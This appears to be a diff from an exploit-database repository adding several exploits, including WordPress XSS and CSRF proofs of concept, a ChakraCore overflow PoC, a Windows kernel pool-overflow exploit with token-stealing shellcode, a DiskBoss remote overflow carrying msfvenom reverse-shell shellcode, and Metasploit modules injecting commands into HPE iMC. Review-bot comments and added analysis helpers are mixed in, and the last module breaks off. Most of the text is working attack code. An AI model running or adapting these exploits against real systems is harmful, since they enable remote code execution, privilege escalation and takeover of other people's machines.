Cli::writeInfo( 'Sending payload...' );
$postData = [
    'action'      => 'admin_menu_tree_page_view_add_page',
    'type'        => 'after',
    'pageID'      => '1',
    'post_type'   => 'page',
    'page_titles' => [ '<script>alert(1)</script>' ],
    'post_status' => 'publish',
];
$r = $s->post( Endpoint::adminAjaxURL(), [], $postData);
if(!$r->success || !$r->body == '0'){
    ExitCodes::exitWithFailed('Failed to retrieve a valid response');
}
ExitCodes::exitWithSuccess('Exploitation successful');
```
Timeline
--------
1. **2017-12-12**: Discovered
2. **2017-12-12**: Tried to contact plugin author through WordPress.org
support threads
3. **2017-12-13**: Tried to contact plugin author by creating an issue
in plugin's repository on Github
4. **2017-12-13**: Vendor replied
5. **2017-12-14**: Vendor received details
6. **2018-01-07**: Patch released


@ -0,0 +1,57 @@
* Exploit Title: WordPress Download Manager [CSRF]
* Discovery Date: 2017-12-12
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: https://www.wpdownloadmanager.com/
* Software Link: https://wordpress.org/plugins/download-manager
* Version: 2.9.60
* Tested on: WordPress 4.9.1
* Category: WebApps, WordPress
Description
-----------
The plugin implements the AJAX action `wpdm-install-addon`, which calls the
function `wpdm_install_addon`. This function takes no anti-CSRF measures, so a
forged request sent from an authenticated administrator's browser succeeds.
What makes this function interesting is that it provides plugin-installation
functionality for admin users. The origin of the package is taken from
`$_REQUEST['addon']`, if set, without any validation.
A malicious actor can exploit this to install a malicious plugin on the
vulnerable site. The install package does not even need to be a valid plugin;
it can simply contain malicious code. Because the package is extracted into
the `/wp-content/plugins/` directory without changing its original folder
structure, an attacker can leverage the CSRF to upload malicious code and
execute it on the affected server.
PoC
---
```
<form method="post" action="http://vuln.dev/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="wpdm-install-addon">
<label> This is the remote url to get plugin from. Everything is valid as long as it's a ZIP archive and ends with .zip
<input type="text" name="addon" value="https://downloads.wordpress.org/plugin/bbpress.2.5.13.zip">
</label>
<button type="submit" value="Submit">Submit</button>
</form>
```
Solution
--------
Update to version 2.9.61.
Timeline
--------
1. **2017-12-12**: Discovered
2. **2017-12-14**: Tried to reach out to vendor using support email address
3. **2017-12-16**: Vendor replied
4. **2017-12-16**: Vendor received details
5. **2017-12-21**: Vendor released a fix


@ -0,0 +1,21 @@
# Exploit Title: Joomla Plugin Easydiscuss <4.0.21 Persistent XSS in Edit Message
# Date: 06-01-2018
# Software Link: https://stackideas.com/easydiscuss
# Exploit Author: Mattia Furlani
# CVE: CVE-2018-5263
# Category: webapps
1. Description
Whenever a user edits a message that contains </textarea> in its body, everything after the </textarea> is rendered and executed in the user's browser. Works with every version up to 4.0.20.
2. Proof of Concept
Log in with permissions to post a message, insert </textarea> in the body and add any HTML code after it; whenever a user tries to edit that message, the code written after the closing textarea tag is executed.
3. Solution:
Update to version 4.0.21
https://stackideas.com/blog/easydiscuss4021-update


@ -0,0 +1,28 @@
/*
The method "Lowerer::LowerSetConcatStrMultiItem" is used to generate machine code to concatenate strings.
Here's a snippet of the method.
void Lowerer::LowerSetConcatStrMultiItem(IR::Instr * instr)
{
...
IR::IndirOpnd * dstLength = IR::IndirOpnd::New(concatStrOpnd, Js::ConcatStringMulti::GetOffsetOfcharLength(), TyUint32, func);
...
InsertAdd(false, dstLength, dstLength, srcLength, instr); <<------ (a)
...
}
At (a), there's no check for integer overflow: dstLength is a TyUint32 field, so the sum simply wraps.
Note: Chakra uses string chains to handle concatenated strings (the ConcatString class), so it doesn't require much memory to trigger the bug.
PoC:
*/
let a = '';
let b = 'A'.repeat(0x10000);
for (let i = 0; i < 0x10000; i++) {
a = 'BBBBBBBBB' + a + b;
}
print(a.length);
print(b.length);
print(a[0]);
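To see why a loop of this size is enough, here is an added Python model of the arithmetic at (a); it is not part of the Project Zero PoC above. It assumes only what the snippet shows: charLength is a 32-bit unsigned counter and each item's length is added into it (how the three items are grouped does not change the result modulo 2^32). It replays the PoC's `a = 'BBBBBBBBB' + a + b` loop and reports the true character count, the value the wrapped counter holds, and the iteration at which the wrap happens; `checked=True` models the overflow check that is missing.

```python
from collections import namedtuple

# Model of Lowerer::LowerSetConcatStrMultiItem: the destination ConcatStringMulti's
# charLength is a 32-bit unsigned field (TyUint32 in the snippet above) and every
# concatenated item's length is added into it without an overflow check.
U32_MAX = 0xFFFFFFFF

ConcatResult = namedtuple('ConcatResult', 'true_len stored_len first_wrap_iteration')


def add_u32(acc, n, checked):
    """Add n into a uint32 accumulator: wrap silently (the bug) or raise (the fix)."""
    total = acc + n
    if total > U32_MAX:
        if checked:
            raise OverflowError('charLength would overflow 32 bits')
        return total & U32_MAX
    return total


def poc_concat_lengths(iterations=0x10000, prefix_len=9, chunk_len=0x10000, checked=False):
    """Replay the PoC loop  a = 'BBBBBBBBB' + a + b  for the given number of rounds.

    Returns the number of characters the flattened string really needs, the value
    a 32-bit charLength ends up holding, and the first iteration (1-based) at which
    the counter wrapped (None if it never did)."""
    true_len = 0      # what flattening 'a' would actually have to copy
    stored_len = 0    # what the engine's charLength field records for 'a'
    first_wrap = None
    for i in range(1, iterations + 1):
        # The inner 'a' contributes its *stored* charLength (already wrapped if it
        # wrapped earlier), which is why the bogus value propagates round by round.
        acc = 0
        for item_len in (prefix_len, stored_len, chunk_len):
            before = acc
            acc = add_u32(acc, item_len, checked)
            if acc < before and first_wrap is None:
                first_wrap = i
        stored_len = acc
        true_len += prefix_len + chunk_len
    return ConcatResult(true_len, stored_len, first_wrap)


def overflow_detected(iterations=0x10000):
    """True if a checked add would reject the PoC before it finishes."""
    try:
        poc_concat_lengths(iterations, checked=True)
    except OverflowError:
        return True
    return False


if __name__ == '__main__':
    r = poc_concat_lengths()
    print('true length  : 0x%x' % r.true_len)
    print('stored length: 0x%x (wrapped at iteration %d)' % (r.stored_len, r.first_wrap_iteration))
    print('checked add rejects PoC:', overflow_detected())
```

The gap between `true_len` and `stored_len` is what a later flatten of `a` (the `a[0]` access in the PoC) would act on: a buffer sized from the wrapped counter receiving a copy driven by the real chain length.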


@ -0,0 +1,322 @@
// ConsoleApplication1.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <Windows.h>
#include <winioctl.h>
#define device L"\\\\.\\WINDRVR1251"
#define SPRAY_SIZE 30000
typedef NTSTATUS(WINAPI *PNtAllocateVirtualMemory)(
HANDLE ProcessHandle,
PVOID *BaseAddress,
ULONG ZeroBits,
PULONG AllocationSize,
ULONG AllocationType,
ULONG Protect
);
// Windows 7 SP1 x86 Offsets
#define KTHREAD_OFFSET 0x124 // nt!_KPCR.PcrbData.CurrentThread
#define EPROCESS_OFFSET 0x050 // nt!_KTHREAD.ApcState.Process
#define PID_OFFSET 0x0B4 // nt!_EPROCESS.UniqueProcessId
#define FLINK_OFFSET 0x0B8 // nt!_EPROCESS.ActiveProcessLinks.Flink
#define TOKEN_OFFSET 0x0F8 // nt!_EPROCESS.Token
#define SYSTEM_PID 0x004 // SYSTEM Process PID
/*
* The driver calls this through the hijacked pointer as a function taking 4
* arguments (0x10 bytes of stack); the `ret 0x10` below pops them itself on
* return (callee cleanup, as in stdcall, not cdecl).
*/
__declspec(naked) VOID TokenStealingShellcode() {
__asm {
hasRun:
xor eax, eax; Set zero
cmp byte ptr [eax], 1; If this is 1, we have already run this code
jz End;
mov byte ptr [eax], 1; Indicate that this code has been hit already
; initialize
mov eax, fs:[eax + KTHREAD_OFFSET]; Get nt!_KPCR.PcrbData.CurrentThread
mov eax, [eax + EPROCESS_OFFSET]; Get nt!_KTHREAD.ApcState.Process
mov ecx, eax; Copy current _EPROCESS structure
mov ebx, [eax + TOKEN_OFFSET]; Copy current nt!_EPROCESS.Token
mov edx, SYSTEM_PID; WIN 7 SP1 SYSTEM Process PID = 0x4
; begin system token search loop
SearchSystemPID :
mov eax, [eax + FLINK_OFFSET]; Get nt!_EPROCESS.ActiveProcessLinks.Flink
sub eax, FLINK_OFFSET
cmp[eax + PID_OFFSET], edx; Get nt!_EPROCESS.UniqueProcessId
jne SearchSystemPID
mov edx, [eax + TOKEN_OFFSET]; Get SYSTEM process nt!_EPROCESS.Token
mov[ecx + TOKEN_OFFSET], edx; Copy nt!_EPROCESS.Token of SYSTEM to current process
End :
ret 0x10; callee pops the 4 arguments (stdcall-style cleanup)
}
}
BOOL map_null_page()
{
/* Begin NULL page map */
HMODULE hmodule = LoadLibraryA("ntdll.dll");
if (hmodule == NULL) // LoadLibraryA returns NULL on failure, not INVALID_HANDLE_VALUE
{
printf("[x] Couldn't get handle to ntdll.dll\n");
return FALSE;
}
PNtAllocateVirtualMemory AllocateVirtualMemory = (PNtAllocateVirtualMemory)GetProcAddress(hmodule, "NtAllocateVirtualMemory");
if (AllocateVirtualMemory == NULL)
{
printf("[x] Couldn't get address of NtAllocateVirtualMemory\n");
return FALSE;
}
SIZE_T size = 0x1000;
PVOID address = (PVOID)0x1;
NTSTATUS allocStatus = AllocateVirtualMemory(GetCurrentProcess(),
&address,
0,
&size,
MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
PAGE_EXECUTE_READWRITE);
if (allocStatus != 0)
{
printf("[x] Error mapping null page\n");
return FALSE;
}
printf("[+] Mapped null page\n");
return TRUE;
}
/*
* Continually flip the size
* @Param user_size - a pointer to the user defined size
*/
DWORD WINAPI flip_thread(LPVOID user_size)
{
printf("[+] Flipping thread started\n");
while (TRUE)
{
*(ULONG *)(user_size) ^= 10; //flip between 0x52 and 0x58, giving a 0x40 byte overflow.
}
return 0;
}
DWORD WINAPI ioctl_thread(LPVOID user_buff)
{
char out_buff[40];
DWORD bytes_returned;
HANDLE hdevice = CreateFile(device,
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
0
);
if (hdevice == INVALID_HANDLE_VALUE)
{
printf("[x] Couldn't open device\n");
return 1; // don't issue the IOCTL on an invalid handle
}
BOOL ret = DeviceIoControl(hdevice,
0x95382623,
user_buff,
0x1000,
out_buff,
40,
&bytes_returned,
0);
CloseHandle(hdevice);
return 0;
}
void spray_pool(HANDLE handle_arr[])
{
//create SPRAY_SIZE event objects filling up the pool
for (int i = 0; i < SPRAY_SIZE; i++)
{
handle_arr[i] = CreateEvent(NULL, 0, NULL, L"");
}
for (int i = 0; i < SPRAY_SIZE; i+=50)
{
for (int j = 0; j < 14 && j + i < SPRAY_SIZE; j++)
{
CloseHandle(handle_arr[j + i]);
handle_arr[j + i] = 0;
}
}
}
void free_events(HANDLE handle_arr[])
{
for (int i = 0; i < SPRAY_SIZE; i++)
{
if (handle_arr[i] != 0)
{
CloseHandle(handle_arr[i]);
}
}
}
BOOL check_priv_count(DWORD old_count, PDWORD updated_count)
{
HANDLE htoken;
DWORD length;
DWORD temp;
DWORD new_count;
PTOKEN_PRIVILEGES current_priv = NULL;
if (!OpenProcessToken(GetCurrentProcess(), GENERIC_READ, &htoken))
{
printf("[x] Couldn't get current token\n");
return FALSE;
}
//get the size required for the current_priv allocation
GetTokenInformation(htoken, TokenPrivileges, current_priv, 0, &length);
//allocate memory for the structure
current_priv = (PTOKEN_PRIVILEGES)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, length);
//get the actual token info
GetTokenInformation(htoken, TokenPrivileges, current_priv, length, &length);
new_count = current_priv->PrivilegeCount;
HeapFree(GetProcessHeap(), 0, current_priv);
CloseHandle(htoken);
temp = old_count; //store the old count
*updated_count = new_count; //update the count
if (new_count > old_count)
{
printf("[+] We now have %d privileges\n", new_count);
return TRUE;
}
else
return FALSE;
}
int main()
{
HANDLE h_flip_thread;
HANDLE h_ioctl_thread;
HANDLE handle_arr[SPRAY_SIZE] = { 0 };
DWORD mask = 0;
DWORD orig_priv_count = 0;
char *user_buff;
check_priv_count(-1, &orig_priv_count);
printf("[+] Original priv count: %d\n", orig_priv_count);
if (!map_null_page())
{
return -1;
}
*(ULONG *)0x74 = (ULONG)&TokenStealingShellcode;
user_buff = (char *)VirtualAlloc(NULL,
0x1000,
MEM_COMMIT | MEM_RESERVE,
PAGE_NOCACHE | PAGE_READWRITE);
if (user_buff == NULL)
{
printf("[x] Couldn't allocate memory for buffer\n");
return -1;
}
memset(user_buff, 0x41, 0x1000);
*(ULONG *)(user_buff + 0x34) = 0x00000052; //set the size initially to 0x52; flip_thread toggles it to 0x58
//pool header block
*(ULONG *)(user_buff + 0x374) = 0x04080070; //ULONG1
*(ULONG *)(user_buff + 0x378) = 0xee657645;//PoolTag
//QuotaInfo block
*(ULONG *)(user_buff + 0x37c) = 0x00000000; //PagedPoolCharge
*(ULONG *)(user_buff + 0x380) = 0x00000040; //NonPagedPoolCharge
*(ULONG *)(user_buff + 0x384) = 0x00000000; //SecurityDescriptorCharge
*(ULONG *)(user_buff + 0x388) = 0x00000000; //SecurityDescriptorQuotaBlock
//Event header block
*(ULONG *)(user_buff + 0x38c) = 0x00000001; //PointerCount
*(ULONG *)(user_buff + 0x390) = 0x00000001; //HandleCount
*(ULONG *)(user_buff + 0x394) = 0x00000000; //NextToFree
*(ULONG *)(user_buff + 0x398) = 0x00080000; //TypeIndex <--- NULL POINTER
*(ULONG *)(user_buff + 0x39c) = 0x867b3940; //objecteCreateInfo
*(ULONG *)(user_buff + 0x400) = 0x00000000;
*(ULONG *)(user_buff + 0x404) = 0x867b3940; //QuotaBlockCharged
/*
* create a suspended thread for flipping, passing in a pointer to the size at user_buff+0x34
* Set its priority to highest.
* Set its mask so that it runs on a particular core.
*/
h_flip_thread = CreateThread(NULL, 0, flip_thread, user_buff + 0x34, CREATE_SUSPENDED, 0);
SetThreadPriority(h_flip_thread, THREAD_PRIORITY_HIGHEST);
SetThreadAffinityMask(h_flip_thread, 2); // CPU 1 (a mask of 0 is invalid and the call fails); the IOCTL thread is pinned to CPU 0
ResumeThread(h_flip_thread);
printf("[+] Starting race...\n");
spray_pool(handle_arr);
while (TRUE)
{
h_ioctl_thread = CreateThread(NULL, 0, ioctl_thread, user_buff, CREATE_SUSPENDED, 0);
SetThreadPriority(h_ioctl_thread, THREAD_PRIORITY_HIGHEST);
SetThreadAffinityMask(h_ioctl_thread, 1);
ResumeThread(h_ioctl_thread);
WaitForSingleObject(h_ioctl_thread, INFINITE);
free_events(handle_arr); //free the event objects
if (check_priv_count(orig_priv_count, &orig_priv_count))
{
printf("[+] Breaking out of loop, popping shell!\n");
break;
}
//pool header block
*(ULONG *)(user_buff + 0x374) = 0x04080070; //ULONG1
*(ULONG *)(user_buff + 0x378) = 0xee657645;//PoolTag
//QuotaInfo block
*(ULONG *)(user_buff + 0x37c) = 0x00000000; //PagedPoolCharge
*(ULONG *)(user_buff + 0x380) = 0x00000040; //NonPagedPoolCharge
*(ULONG *)(user_buff + 0x384) = 0x00000000; //SecurityDescriptorCharge
*(ULONG *)(user_buff + 0x388) = 0x00000000; //SecurityDescriptorQuotaBlock
//Event header block
*(ULONG *)(user_buff + 0x38c) = 0x00000001; //PointerCount
*(ULONG *)(user_buff + 0x390) = 0x00000001; //HandleCount
*(ULONG *)(user_buff + 0x394) = 0x00000000; //NextToFree
*(ULONG *)(user_buff + 0x398) = 0x00080000; //TypeIndex <--- NULL POINTER
*(ULONG *)(user_buff + 0x39c) = 0x867b3940; //objecteCreateInfo
*(ULONG *)(user_buff + 0x400) = 0x00000000;
*(ULONG *)(user_buff + 0x404) = 0x867b3940; //QuotaBlockCharged
spray_pool(handle_arr);
}
system("cmd.exe");
return 0;
}


@ -1,3 +1,5 @@
#!/usr/bin/pythion
# Exploit Title: Buffer overflow in NetTransport Download Manager - Version 2.96L (DEP Bypass) # Exploit Title: Buffer overflow in NetTransport Download Manager - Version 2.96L (DEP Bypass)
# CVE: CVE-2017-17968 # CVE: CVE-2017-17968
# Date: 28-12-2017 # Date: 28-12-2017
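Review bot: the shebang on the first line of the hunk stays `#!/usr/bin/pythion` in both columns, so the script still cannot be run through its interpreter line; change it to `#!/usr/bin/env python` while the header is being touched.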
@ -8,12 +10,12 @@
# Category: webapps # Category: webapps
# Impact: Code execution # Impact: Code execution
1. Description #1. Description
#
A buffer overflow vulnerability in NetTransport.exe in NetTransport Download Manager 2.96L and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long HTTP response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution #A buffer overflow vulnerability in NetTransport.exe in NetTransport Download Manager 2.96L and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long HTTP response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution
#
2. Proof of Concept #2. Proof of Concept
#
#!/usr/bin/pythion #!/usr/bin/pythion
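Review bot: the new column turns the description into `#` comments but keeps a second `#!/usr/bin/pythion` on the last line of the hunk, which is both a duplicate shebang and the same typo; remove it. Also, `# Category: webapps` does not fit what the description says this is (a client-side overflow in NetTransport.exe triggered by a malicious HTTP response header); the category should reflect that.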
@ -114,6 +116,6 @@ if __name__ == '__main__':
3. Solution: #3. Solution:
#
No solution available at the moment. #No solution available at the moment.

exploits/windows/remote/43478.py

@ -0,0 +1,105 @@
# Exploit Title: DiskBoss <= 8.8.16 - Unauthenticated Remote Code Execution
# Date: 2017-08-27
# Exploit Author: Arris Huijgen
# Vendor Homepage: http://www.diskboss.com/
# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v8.8.16.exe
# Version: Through 8.8.16
# Tested on: Windows 7 SP1 x64, Windows XP SP3 x86
# CVE: CVE-2018-5262
# Usage
# 1. Update the Target section
# 2. Update the shellcode
# 3. Launch!
import socket
from struct import pack
# Software editions (port, offset)
free8416 = (8096, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
pro8416 = (8097, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
ult8416 = (8098, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
srv8416 = (8094, 0x1001806e) # ADD ESP,8 | RET 0x04 @ libpal.dll
ent8416 = (8094, 0x1001806e) # ADD ESP,8 | RET 0x04 @ libpal.dll
ent8512 = (8094, 0x100180ee) # ADD ESP,8 | RET 0x04 @ libpal.dll
free8816 = (8096, 0x10037f6a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
pro8816 = (8097, 0x10037f6a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
ult8816 = (8098, 0x10037f6a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
srv8816 = (8094, 0x100180f9) # ADD ESP,8 | RET 0x04 @ libpal.dll
ent8816 = (8094, 0x100180f9) # ADD ESP,8 | RET 0x04 @ libpal.dll
# Target
host = '127.0.0.1'
(port, addr) = ent8816
def main():
# Connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print '[+] Connected to %s:%d' % (host, port)
# Memory
size = 1000
offset = 128
# Payload
preret = '\xEB\x06\x90\x90' # JMP 0x06
ret = pack('<I', addr) # Depending on the software edition
pivot = '\xe9\x3f\xfb\xff\xff' # JMP -0x4BC
# msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1234 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b '\x00'
# Payload size: 351 bytes
sc = (
"\xb8\x80\xac\x48\x8f\xd9\xc4\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1"
"\x52\x31\x45\x12\x03\x45\x12\x83\x45\xa8\xaa\x7a\xb9\x59\xa8"
"\x85\x41\x9a\xcd\x0c\xa4\xab\xcd\x6b\xad\x9c\xfd\xf8\xe3\x10"
"\x75\xac\x17\xa2\xfb\x79\x18\x03\xb1\x5f\x17\x94\xea\x9c\x36"
"\x16\xf1\xf0\x98\x27\x3a\x05\xd9\x60\x27\xe4\x8b\x39\x23\x5b"
"\x3b\x4d\x79\x60\xb0\x1d\x6f\xe0\x25\xd5\x8e\xc1\xf8\x6d\xc9"
"\xc1\xfb\xa2\x61\x48\xe3\xa7\x4c\x02\x98\x1c\x3a\x95\x48\x6d"
"\xc3\x3a\xb5\x41\x36\x42\xf2\x66\xa9\x31\x0a\x95\x54\x42\xc9"
"\xe7\x82\xc7\xc9\x40\x40\x7f\x35\x70\x85\xe6\xbe\x7e\x62\x6c"
"\x98\x62\x75\xa1\x93\x9f\xfe\x44\x73\x16\x44\x63\x57\x72\x1e"
"\x0a\xce\xde\xf1\x33\x10\x81\xae\x91\x5b\x2c\xba\xab\x06\x39"
"\x0f\x86\xb8\xb9\x07\x91\xcb\x8b\x88\x09\x43\xa0\x41\x94\x94"
"\xc7\x7b\x60\x0a\x36\x84\x91\x03\xfd\xd0\xc1\x3b\xd4\x58\x8a"
"\xbb\xd9\x8c\x1d\xeb\x75\x7f\xde\x5b\x36\x2f\xb6\xb1\xb9\x10"
"\xa6\xba\x13\x39\x4d\x41\xf4\x39\x92\x49\x05\xae\x90\x49\x01"
"\xfc\x1c\xaf\x63\x10\x49\x78\x1c\x89\xd0\xf2\xbd\x56\xcf\x7f"
"\xfd\xdd\xfc\x80\xb0\x15\x88\x92\x25\xd6\xc7\xc8\xe0\xe9\xfd"
"\x64\x6e\x7b\x9a\x74\xf9\x60\x35\x23\xae\x57\x4c\xa1\x42\xc1"
"\xe6\xd7\x9e\x97\xc1\x53\x45\x64\xcf\x5a\x08\xd0\xeb\x4c\xd4"
"\xd9\xb7\x38\x88\x8f\x61\x96\x6e\x66\xc0\x40\x39\xd5\x8a\x04"
"\xbc\x15\x0d\x52\xc1\x73\xfb\xba\x70\x2a\xba\xc5\xbd\xba\x4a"
"\xbe\xa3\x5a\xb4\x15\x60\x7a\x57\xbf\x9d\x13\xce\x2a\x1c\x7e"
"\xf1\x81\x63\x87\x72\x23\x1c\x7c\x6a\x46\x19\x38\x2c\xbb\x53"
"\x51\xd9\xbb\xc0\x52\xc8"
)
# Compile payload
fill = 'A' * (offset - len(preret))
code = fill + preret + ret + pivot
nops = '\x90' * (size - len(code) - len(sc) - 100)
payload = code + nops + sc + 'C' * 100
# Compile message
msg = (
'\x75\x19\xba\xab' +
'\x03\x00\x00\x00' +
'\x00\x40\x00\x00' +
pack('<I', len(payload)) +
pack('<I', len(payload)) +
pack('<I', ord(payload[-1])) +
payload
)
# Send message
s.send(msg)
print '[+] Exploit sent!'
if __name__ == '__main__':
main()
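As an added check on the stub layout (not part of the exploit above), the following Python reproduces the buffer arithmetic with a constructed 351-byte filler in place of the shellcode and decodes the two JMP stubs so their comments can be verified: the `\xEB\x06` must hop over the two NOPs and the gadget address onto the `\xE9` pivot, and the pivot's rel32 must resolve to the -0x4BC noted beside it. The gadget address used is the ent8816 one; everything else is taken from the file.

```python
import struct

# Layout constants copied from the exploit above; the real shellcode is replaced
# by a constructed 351-byte INT3 filler so this runs without any payload.
SIZE = 1000
OFFSET = 128
PRERET = b'\xEB\x06\x90\x90'          # JMP SHORT +6 over the NOPs and the return address
RET = struct.pack('<I', 0x100180f9)   # ADD ESP,8 | RET 0x04 (ent8816 gadget in libpal.dll)
PIVOT = b'\xe9\x3f\xfb\xff\xff'       # JMP NEAR rel32
SC_LEN = 351


def decode_jmp(buf, off):
    """Decode an x86 JMP at buf[off] (EB rel8 or E9 rel32) and return the target
    offset within buf. Relative targets count from the end of the instruction."""
    op = buf[off]
    if op == 0xEB:
        rel = struct.unpack_from('<b', buf, off + 1)[0]
        return off + 2 + rel
    if op == 0xE9:
        rel = struct.unpack_from('<i', buf, off + 1)[0]
        return off + 5 + rel
    raise ValueError('no JMP opcode at offset %d' % off)


def build_payload(sc=b'\xCC' * SC_LEN):
    """Reproduce the exploit's buffer and return (payload, offsets of each part)."""
    fill = b'A' * (OFFSET - len(PRERET))
    code = fill + PRERET + RET + PIVOT
    nops = b'\x90' * (SIZE - len(code) - len(sc) - 100)
    payload = code + nops + sc + b'C' * 100
    offsets = {
        'preret': len(fill),
        'ret': len(fill) + len(PRERET),
        'pivot': len(code) - len(PIVOT),
        'nops': len(code),
        'shellcode': len(code) + len(nops),
    }
    return payload, offsets


def check_layout():
    """Verify the two stubs: PRERET must land exactly on PIVOT, and PIVOT's
    displacement is reported relative to its own start (negative = backwards,
    before the start of this buffer)."""
    payload, off = build_payload()
    if len(payload) != SIZE:
        raise ValueError('payload is %d bytes, expected %d' % (len(payload), SIZE))
    preret_target = decode_jmp(payload, off['preret'])
    pivot_target = decode_jmp(payload, off['pivot'])
    return {
        'preret_lands_on_pivot': preret_target == off['pivot'],
        'pivot_delta': pivot_target - off['pivot'],
    }


if __name__ == '__main__':
    _, off = build_payload()
    print('offsets:', off)
    print('layout :', check_layout())
```

The pivot's negative displacement is the reason the file calls the gadget a pivot: execution leaves this 1000-byte buffer rather than landing in the NOP sled after it, so the sled and shellcode offsets reported by `build_payload` are only meaningful once the real stack layout at crash time is known.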

exploits/windows/remote/43492.rb

@ -0,0 +1,207 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
def initialize(info = {})
super(update_info(info,
'Name' => 'HPE iMC dbman RestoreDBase Unauthenticated RCE',
'Description' => %q{
This module exploits a remote command execution vulnerability in
Hewlett Packard Enterprise Intelligent Management Center before
version 7.3 E0504P04.
The dbman service allows unauthenticated remote users to restore
a user-specified database (OpCode 10007), however the database
connection username is not sanitized resulting in command injection,
allowing execution of arbitrary operating system commands as SYSTEM.
This service listens on TCP port 2810 by default.
This module has been tested successfully on iMC PLAT v7.2 (E0403)
on Windows 7 SP1 (EN).
},
'License' => MSF_LICENSE,
'Author' =>
[
'sztivi', # Discovery
'Chris Lyne', # Python PoC (@lynerc)
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'References' =>
[
['CVE', '2017-5817'],
['EDB', '43195'],
['ZDI', '17-341'],
['URL', 'https://www.securityfocus.com/bid/98469/info'],
['URL', 'https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us']
],
'Platform' => 'win',
'Targets' => [['Automatic', {}]],
'Payload' => { 'BadChars' => "\x00" },
'DefaultOptions' => { 'WfsDelay' => 15 },
'Privileged' => true,
'DisclosureDate' => 'May 15 2017',
'DefaultTarget' => 0))
register_options [Opt::RPORT(2810)]
end
def check
# empty RestoreDBase packet
pkt = [10007].pack('N')
connect
sock.put pkt
res = sock.get_once
disconnect
# Expected reply:
# "\x00\x00\x00\x01\x00\x00\x00:08\x02\x01\xFF\x043Dbman deal msg error, please to see dbman_debug.log"
return CheckCode::Detected if res =~ /dbman/i
CheckCode::Safe
end
def dbman_msg(database_user)
data = ''
db_ip = "#{rand(255)}.#{rand(255)}.#{rand(255)}.#{rand(255)}"
database_type = "\x03" # MySQL
restore_type = 'MANUAL'
database_password = rand_text_alpha rand(1..5)
database_port = rand_text_alpha rand(1..5)
database_instance = rand_text_alpha rand(1..5)
junk = rand_text_alpha rand(1..5)
# database ip
data << "\x04"
data << [db_ip.length].pack('C')
data << db_ip
# ???
data << "\x04"
data << [junk.length].pack('C')
data << junk
# ???
data << "\x04"
data << [junk.length].pack('C')
data << junk
# junk
data << "\x04"
data << [junk.length].pack('C')
data << junk
# ???
data << "\x02\x01\x01"
# database type
data << "\x02"
data << [database_type.length].pack('C')
data << database_type
# restore type
data << "\x04"
data << [restore_type.length].pack('C')
data << restore_type
# ???
data << "\x04"
data << [junk.length].pack('C')
data << junk
# database user
data << "\x04"
data << "\x82"
data << [database_user.length].pack('n')
data << database_user
# database password
data << "\x04"
data << [database_password.length].pack('C')
data << database_password
# database port
data << "\x04"
data << [database_port.length].pack('C')
data << database_port
# database instance
data << "\x04"
data << [database_instance.length].pack('C')
data << database_instance
# ???
data << "\x04"
data << [junk.length].pack('C')
data << junk
# ???
data << "\x04"
data << [junk.length].pack('C')
data << junk
# ???
data << "\x04"
data << [junk.length].pack('C')
data << junk
# ???
data << "\x04"
data << [junk.length].pack('C')
data << junk
# ???
data << "\x30\x00"
data << "\x02\x01\x01"
data
end
def dbman_restoredbase_pkt(database_user)
data = dbman_msg database_user
# opcode 10007 (RestoreDBase)
pkt = [10007].pack('N')
# packet length
pkt << "\x00\x00"
pkt << [data.length + 4].pack('n')
# packet data length
pkt << "\x30\x82"
pkt << [data.length].pack('n')
# packet data
pkt << data
pkt
end
def execute_command(cmd, _opts = {})
connect
sock.put dbman_restoredbase_pkt "\"& #{cmd} &"
disconnect
end
def exploit
command = cmd_psh_payload(
payload.encoded,
payload_instance.arch.first,
{ :remove_comspec => true, :encode_final_payload => true }
)
if command.length > 8000
fail_with Failure::BadConfig, "#{peer} - The selected payload is too long to execute through Powershell in one command"
end
print_status "Sending payload (#{command.length} bytes)..."
execute_command command
end
end

exploits/windows/remote/43493.rb

@ -0,0 +1,153 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
def initialize(info = {})
super(update_info(info,
'Name' => 'HPE iMC dbman RestartDB Unauthenticated RCE',
'Description' => %q{
This module exploits a remote command execution vulnerability in
Hewlett Packard Enterprise Intelligent Management Center before
version 7.3 E0504P04.
The dbman service allows unauthenticated remote users to restart
a user-specified database instance (OpCode 10008), however the
instance ID is not sanitized, allowing execution of arbitrary
operating system commands as SYSTEM. This service listens on
TCP port 2810 by default.
This module has been tested successfully on iMC PLAT v7.2 (E0403)
on Windows 7 SP1 (EN).
},
'License' => MSF_LICENSE,
'Author' =>
[
'sztivi', # Discovery
'Chris Lyne', # Python PoC (@lynerc)
